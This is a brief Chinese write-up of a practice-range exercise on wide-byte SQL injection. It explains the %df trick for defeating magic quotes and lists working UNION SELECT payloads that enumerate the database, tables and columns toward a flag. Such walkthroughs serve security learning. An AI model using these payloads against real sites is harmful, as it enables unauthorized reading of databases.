进入靶场 输入id=1
宽字节注入原理其实和显错没有其他区别 唯一不同的就是我们需要利用编码不同把魔术引号吃掉进行攻击
?id=1%df' and 1=2 union select 1,2,database()%23
接下来爆表名
?id=1 %df' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() %23
爆字段
?id=1 %df' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7a6b6171 %23
爆flag
打赏我,让我更有动力~
© 2016 - 2023 掌控者 All Rights Reserved.